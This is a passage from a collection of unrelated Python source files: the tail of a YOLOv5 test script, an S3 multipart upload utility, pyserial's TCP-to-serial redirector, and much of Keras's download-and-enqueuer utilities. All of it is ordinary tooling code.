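    return inter / (area1[:, None] + area2[None, :] - inter + 1e-16)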
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ('train', 'val', 'test'): # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
opt=opt
)
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights:
test(opt.data, w, opt.batch_size, opt.img_size, 0.25, 0.45, save_json=False, plots=False, opt=opt)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = test(opt.data, w, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False, opt=opt)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
|
multipartupload.py
|
import argparse
import boto3
import json
import multiprocessing
# Starts Multipart Upload
def start_upload(bucket, key):
boto3.setup_default_session(profile_name='cloudguru')
s3_client = boto3.client('s3')
response = s3_client.create_multipart_upload(
Bucket = bucket,
Key = key
)
return response['UploadId']
# Add upload part
def add_part(proc_queue, body, bucket, key, part_number, upload_id):
s3_client = boto3.client('s3')
response = s3_client.upload_part(
Body = body,
Bucket = bucket,
Key = key,
PartNumber = part_number,
UploadId = upload_id
)
print(f"Finished Part: {part_number}, ETag: {response['ETag']}")
proc_queue.put({'PartNumber': part_number, 'ETag': response['ETag']})
return
# End Multipart Upload
def end_upload(bucket, key, upload_id, finished_parts):
s3_client = boto3.client('s3')
response = s3_client.complete_multipart_upload(
Bucket = bucket,
Key = key,
MultipartUpload={
'Parts': finished_parts
},
UploadId = upload_id
)
return response
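# Illustrative note (not part of the original script): complete_multipart_upload expects
# the finished_parts list sorted by PartNumber, with each entry shaped like the queue
# items produced by add_part(). The ETag values below are placeholders, not real S3 output.
#   finished_parts = [
#       {'PartNumber': 1, 'ETag': '"0123456789abcdef0123456789abcdef"'},
#       {'PartNumber': 2, 'ETag': '"fedcba9876543210fedcba9876543210"'},
#   ]
#   end_upload('example-bucket', 'example-key', upload_id, finished_parts)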
# Primary logic
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-f', '--file', required = True, help = "File to be chunked and uploaded")
ap.add_argument('-k', '--key', help = "Key for destination object")
ap.add_argument('-b', '--bucket', required = True, help = "Destination bucket")
ap.add_argument('-cs', '--chunk_size', required = True, type = int, choices = range(5,101), metavar = '[5-100]', help = "Chunk size in MiB; S3 requires at least 5 MiB for every part except the last")
ap.add_argument('-p', '--processes', type = int, choices = range(1,256), metavar = '[1-255]', default = 10, help = "Number of upload processes to run simultaneously")
args = vars(ap.parse_args())
if args['key'] in [None, '']:
args['key'] = args['file']
file = args['file']
key = args['key']
bucket = args['bucket']
sim_proc = args['processes']
upload_id = start_upload(bucket, key)
print(f'Starting upload: {upload_id}')
file_upload = open(file, 'rb')
part_procs = []
proc_queue = multiprocessing.Queue()
queue_returns = []
chunk_size = (args['chunk_size'] * 1024) * 1024
part_num = 1
chunk = file_upload.read(chunk_size)
while len(chunk) > 0:
proc = multiprocessing.Process(target=add_part, args=(proc_queue, chunk, bucket, key, part_num, upload_id))
part_procs.append(proc)
part_num += 1
chunk = file_upload.read(chunk_size)
file_upload.close()  # all chunks have been read; release the file handle before uploading
part_procs = [part_procs[i * sim_proc:(i + 1) * sim_proc] for i in range((len(part_procs) + (sim_proc - 1)) // sim_proc)]
for i in range(len(part_procs)):
for p in part_procs[i]:
p.start()
for p in part_procs[i]:
p.join()
for p in part_procs[i]:
queue_returns.append(proc_queue.get())
queue_returns = sorted(queue_returns, key = lambda i: i['PartNumber'])
response = end_upload(bucket, key, upload_id, queue_returns)
print(json.dumps(response, sort_keys=True, indent=4))
if __name__ == '__main__':
main()
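# Example invocation (hypothetical file, bucket and key names; assumes AWS credentials
# are available for the 'cloudguru' profile used in start_upload()):
#   python multipartupload.py -f backup.tar.gz -b example-bucket -k backups/backup.tar.gz -cs 25 -p 8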
|
tcp_serial_redirect.py
|
#!/usr/bin/env python
# (C) 2002-2009 Chris Liechti <cliechti@gmx.net>
# redirect data from a TCP/IP connection to a serial port and vice versa
# requires Python 2.2 'cause socket.sendall is used
import sys
import os
import time
import threading
import socket
import codecs
import serial
try:
True
except NameError:
True = 1
False = 0
class Redirector:
def __init__(self, serial_instance, socket, ser_newline=None, net_newline=None, spy=False):
self.serial = serial_instance
self.socket = socket
self.ser_newline = ser_newline
self.net_newline = net_newline
self.spy = spy
self._write_lock = threading.Lock()
def shortcut(self):
"""connect the serial port to the TCP port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(True)
self.thread_read.setName('serial->socket')
self.thread_read.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
while self.alive:
try:
data = self.serial.read(1) # read one, blocking
n = self.serial.inWaiting() # look if there is more
if n:
data = data + self.serial.read(n) # and get as much as possible
if data:
# the spy shows what's on the serial port, so log it before converting newlines
if self.spy:
sys.stdout.write(codecs.escape_encode(data)[0])
sys.stdout.flush()
if self.ser_newline and self.net_newline:
# do the newline conversion
# XXX fails for CR+LF in input when it is cut in half at the begin or end of the string
data = self.net_newline.join(data.split(self.ser_newline))
# escape outgoing data when needed (Telnet IAC (0xff) character)
self._write_lock.acquire()
try:
self.socket.sendall(data) # send it over TCP
finally:
self._write_lock.release()
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
# probably got disconnected
break
self.alive = False
def write(self, data):
"""thread safe socket write with no data escaping. used to send telnet stuff"""
self._write_lock.acquire()
try:
self.socket.sendall(data)
finally:
self._write_lock.release()
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1024)
if not data:
break
if self.ser_newline and self.net_newline:
# do the newline conversion
# XXX fails for CR+LF in input when it is cut in half at the begin or end of the string
data = self.ser_newline.join(data.split(self.net_newline))
self.serial.write(data) # get a bunch of bytes and send them
# the spy shows what's on the serial port, so log it after converting newlines
if self.spy:
sys.stdout.write(codecs.escape_encode(data)[0])
sys.stdout.flush()
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
# probably got disconnected
break
self.alive = False
self.thread_read.join()
def stop(self):
"""Stop copying"""
if self.alive:
self.alive = False
self.thread_read.join()
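# Minimal usage sketch (not part of the original script): how a Redirector could be wired
# up by hand, assuming a pyserial device name and a single accepted TCP client. The device
# name and port below are placeholders; the __main__ block underneath is the real CLI.
def _example_redirect(device='/dev/ttyUSB0', tcp_port=7777):
    ser = serial.Serial(device, 9600, timeout=1)  # timeout lets the reader thread exit
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('', tcp_port))
    srv.listen(1)
    connection, addr = srv.accept()
    # no newline conversion, no spy output
    Redirector(ser, connection, None, None, False).shortcut()
    connection.close()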
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Simple Serial to Network (TCP/IP) redirector.",
epilog = """\
NOTE: no security measures are implemented. Anyone can remotely connect
to this service over the network.
Only one connection at a time is supported. When the connection is terminated,
the program waits for the next connection.
""")
parser.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non error messages",
default = False
)
parser.add_option("--spy",
dest = "spy",
action = "store_true",
help = "peek at the communication and print all data to the console",
default = False
)
group = optparse.OptionGroup(parser,
"Serial Port",
"Serial port settings"
)
parser.add_option_group(group)
group.add_option("-p", "--port",
dest = "port",
help = "port, a number (default 0) or a device name",
default = None
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default: %default",
default = 9600
)
group.add_option("", "--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O], default=%default",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = None
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = None
)
group = optparse.OptionGroup(parser,
"Network settings",
"Network configuration."
)
parser.add_option_group(group)
group.add_option("-P", "--localport",
dest = "local_port",
action = "store",
type = 'int',
help = "local TCP port",
default = 7777
)
group = optparse.OptionGroup(parser,
"Newline Settings",
"Convert newlines between network and serial port. Conversion is normally disabled and can be enabled by --convert."
)
parser.add_option_group(group)
group.add_option("-c", "--convert",
dest = "convert",
action = "store_true",
help = "enable newline conversion (default off)",
default = False
)
group.add_option("--net-nl",
dest = "net_newline",
action = "store",
help = "type of newlines that are expected on the network (default: %default)",
default = "LF"
)
group.add_option("--ser-nl",
dest = "ser_newline",
action = "store",
help = "type of newlines that are expected on the serial port (default: %default)",
default = "CR+LF"
)
(options, args) = parser.parse_args()
# get port and baud rate from command line arguments or the option switches
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
if port is None: port = 0
# check newline modes for network connection
mode = options.net_newline.upper()
if mode == 'CR':
net_newline = '\r'
elif mode == 'LF':
net_newline = '\n'
elif mode == 'CR+LF' or mode == 'CRLF':
net_newline = '\r\n'
else:
parser.error("Invalid value for --net-nl. Valid are 'CR', 'LF' and 'CR+LF'/'CRLF'.")
# check newline modes for serial connection
mode = options.ser_newline.upper()
if mode == 'CR':
ser_newline = '\r'
elif mode == 'LF':
ser_newline = '\n'
elif mode == 'CR+LF' or mode == 'CRLF':
ser_newline = '\r\n'
else:
parser.error("Invalid value for --ser-nl. Valid are 'CR', 'LF' and 'CR+LF'/'CRLF'.")
# connect to serial port
ser = serial.Serial()
ser.port = port
ser.baudrate = baudrate
ser.parity = options.parity
ser.rtscts = options.rtscts
ser.xonxoff = options.xonxoff
ser.timeout = 1 # required so that the reader thread can exit
if not options.quiet:
sys.stderr.write("--- TCP/IP to Serial redirector --- type Ctrl-C / BREAK to quit\n")
sys.stderr.write("--- %s %s,%s,%s,%s ---\n" % (ser.portstr, ser.baudrate, 8, ser.parity, 1))
try:
ser.open()
except serial.SerialException, e:
sys.stderr.write("Could not open serial port %s: %s\n" % (ser.portstr, e))
sys.exit(1)
if options.rts_state is not None:
ser.setRTS(options.rts_state)
if options.dtr_state is not None:
ser.setDTR(options.dtr_state)
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind( ('', options.local_port) )
srv.listen(1)
while True:
try:
sys.stderr.write("Waiting for connection on %s...\n" % options.local_port)
connection, addr = srv.accept()
sys.stderr.write('Connected by %s\n' % (addr,))
# enter network <-> serial loop
r = Redirector(
ser,
connection,
options.convert and ser_newline or None,
options.convert and net_newline or None,
options.spy,
)
r.shortcut()
if options.spy: sys.stdout.write('\n')
sys.stderr.write('Disconnected\n')
connection.close()
except KeyboardInterrupt:
break
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
sys.stderr.write('\n--- exit ---\n')
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import traceback
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_length = response.info().get('Content-Length')
total_size = -1
if content_length is not None:
total_size = int(content_length.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
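# Minimal usage sketch (assumed URL and file name, not part of the original module; the
# function is defined but never called here): downloads into ~/.keras/datasets/ and
# extracts the tarball next to it.
def _example_get_file():
    path = get_file('example.tar.gz',
                    origin='https://example.com/data/example.tar.gz',
                    extract=True,
                    archive_format='tar')
    return path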
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if algorithm in ('sha256', 'auto'):  # without a reference hash to inspect, 'auto' falls back to sha256
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm == 'sha256') or
(algorithm == 'auto' and len(file_hash) == 64)):
hasher = 'sha256'
else:
hasher = 'md5'
return str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash)
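# Minimal verification sketch (hypothetical path; defined but never called here):
# _hash_file computes a digest and validate_file compares a file against an expected one.
def _example_validate(fpath='/tmp/example.zip'):
    expected = _hash_file(fpath, algorithm='sha256')
    return validate_file(fpath, expected, algorithm='auto')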
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement `on_epoch_end`.
The method `__getitem__` should return a complete batch.
# Notes
`Sequence` is a safer way to do multiprocessing. This structure guarantees that the network will only train once
on each sample per epoch, which is not the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create an infinite generator that iterate over the Sequence."""
while True:
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The generator returned by `enqueuer.get()` yields an infinite stream of batches.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence,
use_multiprocessing=False,
shuffle=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.shuffle = shuffle
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda seqs: multiprocessing.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
six.raise_from(StopIteration(e), e)
def _send_sequence(self):
"""Send current Sequence to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
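# Minimal usage sketch (assumes `my_sequence` is a Sequence subclass instance such as the
# CIFAR10Sequence example above; defined but never called here). Shows the
# start / get / stop lifecycle of an OrderedEnqueuer.
def _example_ordered_enqueuer(my_sequence, steps=10):
    enqueuer = OrderedEnqueuer(my_sequence, use_multiprocessing=False, shuffle=True)
    enqueuer.start(workers=2, max_queue_size=10)
    output_generator = enqueuer.get()
    batch = None
    try:
        for _ in range(steps):
            # each item is (inputs, targets) or (inputs, targets, sample_weights)
            batch = next(output_generator)
    finally:
        enqueuer.stop()
    return batch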
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite, in which case the class will raise
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
seed=None):
self.wait_time = wait_time
self._generator = generator
if os.name == 'nt' and use_multiprocessing:
# On Windows, avoid **SYSTEMATIC** error in `multiprocessing`:
# `TypeError: can't pickle generator objects`
# => Suggest multithreading instead of multiprocessing on Windows
raise ValueError('Using a generator with `use_multiprocessing=True`'
' is not supported on Windows (no marshalling of'
' generators across process boundaries). Instead,'
' use single thread/process or multithreading.')
else:
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self._manager = None
self.queue = None
self.seed = seed
def _data_generator_task(self):
if not self._use_multiprocessing:
while not self._stop_event.is_set():
with self.genlock:
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
# On all OSes, avoid **SYSTEMATIC** error
# in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to
# infinite iterator/generator's next() function
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e:
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
if not hasattr(e, '__traceback__'):
setattr(e, '__traceback__', sys.exc_info()[2])
self.queue.put((False, e))
self._stop_event.set()
break
else:
while not self._stop_event.is_set():
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e:
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
traceback.print_exc()
setattr(e, '__traceback__', None)
self.queue.put((False, e))
self._stop_event.set()
break
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
try:
self.max_queue_size = max_queue_size
if self._use_multiprocessing:
self._manager = multiprocessing.Manager()
